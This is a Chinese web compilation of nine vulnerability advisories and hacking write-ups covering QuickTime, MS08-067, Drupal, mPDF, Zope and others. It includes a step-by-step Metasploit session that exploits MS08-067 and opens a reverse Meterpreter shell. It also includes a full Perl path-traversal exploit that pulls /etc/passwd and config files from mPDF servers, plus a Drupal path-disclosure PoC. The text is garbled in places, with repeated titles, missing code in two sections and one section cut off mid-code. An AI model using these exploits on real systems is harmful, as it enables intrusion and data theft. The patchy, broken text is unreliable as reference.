下面是小编为大家带来的Apple QuickTime信息泄露漏洞漏洞预警,本文共9篇,希望大家能够喜欢!
篇1:Apple QuickTime信息泄露漏洞漏洞预警
发布日期:-10-28
更新日期:2011-10-28
受影响系统:
Apple QuickTime Player 7.x
不受影响系统:
Apple QuickTime Player 7.7.1
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 50130
CVE ID: CVE-2011-3220
QuickTime是由苹果电脑所开发的一种多媒体架构,能够处理许多的数字视频、媒体段落、音效、文字、动画、音乐格式,以及交互式全景影像的数项类型,
Apple QuickTime信息泄露漏洞漏洞预警
,
Apple QuickTime在处理视频文件中的URL数据处理程序时存在未初始化内存访问问题,攻击者可利用此漏洞读取内存内容。
<*来源:Luigi Auriemma (aluigi@pivx.com)
链接:support.apple.com/kb/HT5016
*>
建议:
--------------------------------------------------------------------------------
厂商补丁:
Apple
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
support.apple.com/
篇2:MS08067漏洞漏洞预警
这个漏洞已经暴露了很久了,这里我就不说原理了我也不会,所以直接用metasploit操作一下,大牛请绕过
root@bt:~# genlist -s 10.10.10.*
10.10.10.1
10.10.10.2
10.10.10.128
10.10.10.130
10.10.10.254
root@bt:~# nmap -sS -Pn 10.10.10.128
Starting Nmap 6.01 ( nmap.org ) at -04-23 01:49 EDT
Nmap scan report for attacker.dvssc.com (10.10.10.128)
Host is up (0.0000060s latency).
All 1000 scanned ports on attacker.dvssc.com (10.10.10.128) are closed
Nmap done: 1 IP address (1 host up) scanned in 0.08 seconds
root@bt:~# nmap -sS -Pn 10.10.10.130
Starting Nmap 6.01 ( nmap.org ) at 2014-04-23 01:50 EDT
Nmap scan report for service.dvssc.com (10.10.10.130)
Host is up (0.011s latency).
Not shown: 985 closed ports
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
777/tcp open multiling-http
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1030/tcp open iad1
1521/tcp open oracle
6002/tcp open X11:2
7001/tcp open afs3-callback
7002/tcp open afs3-prserver
8099/tcp open unknown
MAC Address: 00:0C:29:D3:08:A0 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.21 seconds
root@bt:~#
root@bt:~# nmap --script=smb-check-vulns 10.10.10.130
Starting Nmap 6.01 ( nmap.org ) at 2014-04-23 01:50 EDT
Nmap scan report for service.dvssc.com (10.10.10.130)
Host is up (0.00032s latency).
Not shown: 985 closed ports
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
777/tcp open multiling-http
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1030/tcp open iad1
1521/tcp open oracle
6002/tcp open X11:2
7001/tcp open afs3-callback
7002/tcp open afs3-prserver
8099/tcp open unknown
MAC Address: 00:0C:29:D3:08:A0 (VMware)
Host script. results:
| smb-check-vulns:
| MS08-067: VULNERABLE
| Conficker: Likely CLEAN
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE--3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
Nmap done: 1 IP address (1 host up) scanned in 0.56 seconds
root@bt:~# msfconsole
Call trans opt: received. 2-19-98 13:24:18 REC:Loc
Trace program: running
wake up, Neo...
the matrix has you
follow the white rabbit.
knock, knock, Neo.
(`. ,-,
` `. ,;' /
`. ,'/ .'
`. X /.'
.-;--''--.._` ` (
.' / `
, ` ' Q '
, , `._
,.| ' `-.;_'
: . ` ; ` ` --,.._;
' ` , ) .'
`._ , ' /_
; ,''-,;' ``-
``-..__``--`
=[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 927 exploits - 499 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nopsmsf > search ms08_067
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/smb/ms08_067_netapi -10-28 00:00:00 UTC great Microsoft Server Service Relative Path Stack Corruption
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > set RHOST 10.10.10.130
RHOST => 10.10.10.130
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 10.10.10.130 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > set LHOST 10.10.10.128
LHOST => 10.10.10.128
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 10.10.10.128:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows - No Service Pack - lang:Unknown
[*] Selected Target: Windows 2003 SP0 Universal
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 10.10.10.130
[*] Meterpreter session 1 opened (10.10.10.128:4444 -> 10.10.10.130:3722) at 2014-04-23 01:53:59 -0400
篇3: XSIO漏洞漏洞预警
文章作者:aullik5
原始出处:hi.baidu.com/aullik5/blog ... a02c6785352416.html
今天要讲的这个漏洞是一个非常猥琐的漏洞,
XSIO漏洞漏洞预警
。
大部分网站都有这个漏洞,不光是百度。
什么是XSIO,为什么说它猥琐呢?
XSIO是因为没有限制图片的position属性为absolute,导致可以控制一张图片出现在网页的任意位置。
那么我们就可以用这张图片去覆盖网页上的任意一个位置,包括网站的banner,包括一个link、一个button。
这就可以导致页面破坏。而给图片设置一个链接后,很显然就可以起到一个钓鱼的作用。
XSIO漏洞:
由于对正常的HTML 标签 是没有做过滤的,所以我们可以用这些标签来实施XSIO攻击,
在百度,发blog是在一个table里,所以我们要先把table闭合掉,然后再插入合适的图片。
如以下代码:
复制内容到剪贴板
代码:
百度.jpg(40.08 KB)
2008-10-21 20:50
如图:匿名用户的头像被我覆盖到了banner处.
在实施具体攻击时,可以用图片覆盖link或者banner,当别人点击原本是link或button时,将跳到我们的恶意网站去。
所以说,这是一个非常猥琐的漏洞!
欲知后事如何,且听下回分解!
PS: 本次活动仅仅是个人行为,与任何组织或集体无关.
从明天开始,将进入我们的XSS之旅。
篇4:DeepSoft.com.sys.Servlet上传漏洞漏洞预警
作者:hackdn
注明
JSP+MSSQL的系统,国外应用广,出在注册上传上,过滤不严,修改下面POST,上传JSP
要上载的照片:
DeepSoft.com.sys.Servlet上传漏洞漏洞预警
,
文件大小没有限制,只是“*.ai,*.psd”文件可能上传后无法显示而已。“>
篇5:Drupal 7.14 = 完全路径泄露漏洞预警
Drupal 7.14 <= Full Path Disclosure Vulnerability
About Drupal:
”Drupal is an open source content management platform. powering millions of websites and
applications. It's built, used, and supported by an active and diverse community of people
around the world.“
Drupal is used by common companies like Ing/Diba, Amnesty International and The White House.
Issue: Full Path Disclosure
风险等级: Medium
The remote attacker has the possibility to detect the full local path of drupal.
This information can be used for processing further attacks against the server.
In includes/bootstrap.inc, line 2695:
-------------------------------------
function request_path() {
static $path;
if (isset($path)) {
return $path;
}
if (isset($_GET['q'])) {
// This is a request with a ?q=foo/bar query string. $_GET['q'] is
// overwritten in drupal_path_initialize(), but request_path() is called
// very early in the bootstrap process, so the original value is saved in
// $path and returned in later calls.
$path = $_GET['q'];
}
elseif (isset($_SERVER['REQUEST_URI'])) {
// This request is either a clean URL, or 'index.php', or nonsense.
// Extract the path from REQUEST_URI.
$request_path = strtok($_SERVER['REQUEST_URI'], '?');
$base_path_len = strlen(rtrim(dirname($_SERVER['SCRIPT_NAME']), '/'));
// Unescape and strip $base_path prefix, leaving q without a leading slash.
$path = substr(urldecode($request_path), $base_path_len + 1);
// If the path equals the script. filename, either because 'index.php' was
// explicitly provided in the URL, or because the server added it to
// $_SERVER['REQUEST_URI'] even when it wasn't provided in the URL (some
// versions of Microsoft IIS do this), the front page should be served.
if ($path == basename($_SERVER['PHP_SELF'])) {
$path = '';
}
}
else {
// This is the front page.
$path = ''; www.xxx.com
}
// Under certain conditions Apache's RewriteRule directive prepends the value
// assigned to $_GET['q'] with a slash. Moreover we can always have a trailing
// slash in place, hence we need to normalize $_GET['q'].
$path = trim($path, '/');
return $path;
}
-------------------------------------
Exploit / Proof Of Concept:
www.xxx.com /?q[]=x
-------------------------------------
修复方案:
Search for:
$path = trim($path, '/');
And add the following line above:
if(is_array($path)) { die(); }
-------------------------------------
篇6:mPDF = 5.3文件泄露及修复漏洞预警
标题: mPDF <= 5.3 File Disclosure
作者: ZadYree
下载地址: www.mpdf1.com/mpdf/download
影响版本: 5.3 and prior
测试平台: 多个
#!/usr/bin/perl -U
=head1 TITLE
mPDF <= 5.3 File Disclosure Exploit (0day)
=head2 SYNOPSIS
-- examples/show_code.php --
preg_match('/example[0]{0,1}(d+)_(.*?).php/',$filename,$m); <--- URI unproperly filtered.
$num = intval($m[1]);
$title = ucfirst(preg_replace('/_/',' ',$m[2]));
if (!$num || !$title) { die(”Invalid file“); }
=head2 DESCRIPTION
This vulnerability, due to a weak filter, lets you download any unprotected remote
content, under PDF format.
The exploit may not work, depending on the set up htaccess/chmod rules on the
remote server.
=head2 USAGE
perl exploit.pl -r www.2cto.com /mpdf53/ ../config.php
perl exploit.pl -a p00niez.com/mpdf53/ /etc/passwd
Requiered modules:
PDF::OCR2
LWP::Simple
File::Type
Download a module:
sudo cpan -fi install Module::Name
=head3 Author
Zadyree ~ 3LRVS Team | Blog: z4d.tuxfamily.org/blog
=head3 Thanks
PHDays CTF - Yes, CTFs sometime do give you 0dayz
3LRVS Team - Support
=cut
#************* Configuration **************#
my $pdf_file = '/tmp/b00m.pdf';
$PDF::OCR2::CHECK_PDF = 0;
$del_temp_file = 1;
#******************************************#
use 5.010;
use PDF::OCR2;
use Getopt::Std;
use LWP::Simple;
use File::Type;
use constant TRUE => 1;
use constant FALSE => 0;
help unless (@ARGV >= 2);
my (%optz, $uri);
getopts('rah', %optz);
my $relative = $optz{'r'};
my $absolute = $optz{'a'};
my $help = $optz{'h'};
help() unless ($absolute || $relatife);
my ($purl, $fpath) = @ARGV;
my $name = $purl;
$name =~ s{(.+?)/.*} {$1};
$name .= (”_“ . localtime(time) . ”.txt“);
$uri = '/examples/show_code.php?filename=example03_LRVS.php/../../../../../../../../' if ($absolute);
$uri = '/examples/show_code.php?filename=example03_LRVS.php/../../' if ($relative);
help() unless ($uri);
my $furl = $purl . $uri . $fpath;
$furl =~ s#(//)#$i++?”/“:$1#eg; # Yeah that's twisted.
say ”[*]Retrieving content...“;
my $file = make_file(get($furl));
die ”[-]The stream you requested is not well formatted (forbidden page, etc).�12“ unless is_pdf($file);
say ”[+]OK�12[*]Converting format...“;
$pdf = PDF::OCR2->new($file);
my $text = $pdf->text;
$text =~ s/[^x0A-x7F]+?//gm;
open(my $fh, '>', $name);
print $fh $text;
close($fh);
say ”[+]OK�12[+]Content successfully extracted!nFile: “, $name;
unlink($pdf_file) if ($del_temp_file == TRUE);
sub make_file {
my $content = shift;
open($fh, '>', $pdf_file);
print $fh $content;
close($fh);
return($pdf_file);
}
sub is_pdf {
my $checked_file = shift;
my $ft = File::Type->new();
return(1) if ($ft->mime_type($checked_file) eq ”application/pdf“);
return(0);
}
help() if ($help);
sub help {
say <<”EOF";
Usage: perl $0 [-r|-a] [mPDF URL]
Details:
-r : Relative path (ex: ../file.php)
-a : Absolute path (ex: /etc/file.zd)
For any more information, feel free to contact ZadYree
Happy hacking!
EOF
exit(0);
}
篇7:MolyXBoard原代码泄露漏洞
前言
MolyXBoard(以下简称MXB)是MolyXStudios小组(好象就是CNVBB小组)开发的PHP论坛程序,MXB融合了众多论坛程序的优点,博采众长,功能强大,多年的论坛程序汉化和改进经验也使MXB更适合国人的使用习惯。不过漏洞是难免的。
受影响系统
MolyXBoard2.0
MolyXBoard2.1
详细
attachment.php缺乏对attach变量进行检查,导致远程攻击者可以构造这个变量访问该服务器上允许访问的存在的文件,
文件其中一段代码:
functionshowattachment()
{
global$DB,$forums,$_INPUT,$bbuserinfo,$bboptions;
$forums->noheader=1;
if(!$_INPUT[
篇8:2Bgal admin/phpinfo.php脚本信息泄露漏洞
影响版本:
2Bgal 3.1.2
程序介绍:
2BGal是用于发布照片、相册的PHP/MySQL脚本,
漏洞分析:
2BGal的admin/phpinfo.php脚本对phpinfo函数的调用是公开可访问的,远程攻击者可以通过直接请求文件泄露PHP配置信息。
解决方案:
厂商补丁:
Ben3w
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
www.ben3w.com/multimedia/devphp_2bgal.php
信息来源:
<*来源:NoGe (jong_amq@hotmail.com)
链接:secunia.com/advisories/35586/
*>
篇9:Zope CSVTable远程文件信息泄露漏洞
受影响系统:Debian Linux 3.1
Zope Zope 2.8.8
Zope Zope 2.7.5描述:
BUGTRAQ ID: 20022CVE(CAN) ID: CVE-2006-4684
Zope是一款基于Python的开放源代码内容管理系统服务程序,
Zope在处理网页标记时存在漏洞,远程攻击者可能利用此漏洞非授权访问文件。
Zope没有在包含有ReST标记的Web页面中禁用csv_table指令,导致泄漏Zope服务器可读的文件。
<*来源:Debian Advisory
链接:www.debian.org/security/2005/dsa-1176
*>
建议:
厂商补丁:Debian
------
Debian已经为此发布了一个安全公告(DSA-1176-1)以及相应补丁:
DSA-1176-1:New zope2.7 packages fix information disclosure
链接:www.debian.org/security/2005/dsa-1176
补丁下载:
Source archives:
security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge3.dsc
Size/MD5 checksum: 906 b4ea5636227d16c5df630894d2b76967
security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge3.diff.gz
Size/MD5 checksum: 51399 ee75bf3e88b6eb161ccc431e1077bce8
security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5.orig.tar.gz
Size/MD5 checksum: 2885871 5b5c5823c62370d9f7325c6014a49d8b
Alpha architecture:
security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge3_alpha.deb
Size/MD5 checksum: 2669566 2c4d8fb2ac3e9dba4f7de9caf0868b51
AMD64 architecture:
security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge3_amd64.deb
Size/MD5 checksum: 2661080 8108a298111e6abad30073cbd002093e
ARM architecture:
security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge3_arm.deb
Size/MD5 checksum: 2616068 9d77c1ccce693668a3a7e2bb0f35491d
HP Precision architecture:
security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge3_hppa.deb
Size/MD5 checksum: 2736774 1fd5611ff6fa57d561b15bae9d836fe7
Intel IA-32 architecture:
security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge3_i386.deb
Size/MD5 checksum: 2608554 779c9e75c919a1d39d0db7a9a6fc14d9
Intel IA-64 architecture:
security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge3_ia64.deb
Size/MD5 checksum: 2959538 d800e88a7a988d9bb0db833df57f074a
Motorola 680x0 architecture:
security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge3_m68k.deb
Size/MD5 checksum: 2601510 cdd9b090bf745ab74545361936b415c8
Big endian MIPS architecture:
security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge3_mips.deb
Size/MD5 checksum: 2675666 260205e53eb3802ad50c4adcc8ac0d5f
Little endian MIPS architecture:
security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge3_mipsel.deb
Size/MD5 checksum: 2678458 dc9af18e0027a9fb7ae507ff33e050b9
PowerPC architecture:
security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge3_powerpc.deb
Size/MD5 checksum: 2723958 90e0b09a7f8d299a60c09947b86a72e5
IBM S/390 architecture:
security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge3_s390.deb
Size/MD5 checksum: 2663150 a5f76f5bc20b8fde2ed6ffcf24dffa33
Sun Sparc architecture:
security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge3_sparc.deb
Size/MD5 checksum: 2670708 66e3bd2e47d38d33bf951711e59f7592
补丁安装方法:
1. 手工安装补丁包:
首先,使用下面的命令来下载补丁软件:
# wget url (url是补丁下载链接地址)
然后,使用下面的命令来安装补丁:
# dpkg -i file.deb (file是相应的补丁名)
2. 使用apt-get自动安装补丁包:
首先,使用下面的命令更新内部数据库:
# apt-get update
然后,使用下面的命令安装更新软件包:
# apt-get upgrade
★iShowMusic V1.2 写入shell漏洞漏洞预警
★Android Linux Kernel 2.6本地DoS漏洞预警
★xheditor编辑器upload.php畸形文件上传漏洞漏洞预警
文档为doc格式
